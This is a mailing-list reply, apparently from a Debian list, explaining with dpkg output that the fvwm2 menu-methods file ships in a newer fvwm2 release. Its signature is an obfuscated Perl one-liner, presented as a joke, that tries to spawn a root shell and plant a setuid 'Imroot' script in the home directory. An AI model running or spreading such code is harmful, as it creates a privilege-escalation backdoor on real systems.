Re: Package configuration philosophy

Chris Walker:
> I'm not sure about the situation in unstable, but in stable neither the
> menu package, or fvwm2 seem to provide /etc/menu-methods/fvwm2.
> This file is available in /usr/doc/menu/examples. Because of this, the
> menu is not updated by default. Is this the case in unstable or should I
> report it as a bug?
>
> Having copied the example file over, the result is excellent and should
> be a selling point for Debian. Well done.

[joey@kite] ~>dpkg -S /etc/menu-methods/fvwm2
fvwm2: /etc/menu-methods/fvwm2
[joey@kite] ~>dpkg -s fvwm2 |grep Version:
Version: 2.0.45-BETA-1

So no need to file a bug report, just wait until the new fvwm2 gets into
stable..

Oh yeah, check out my cool prompt ;-)

--
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod             joey@kite.ml.org
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_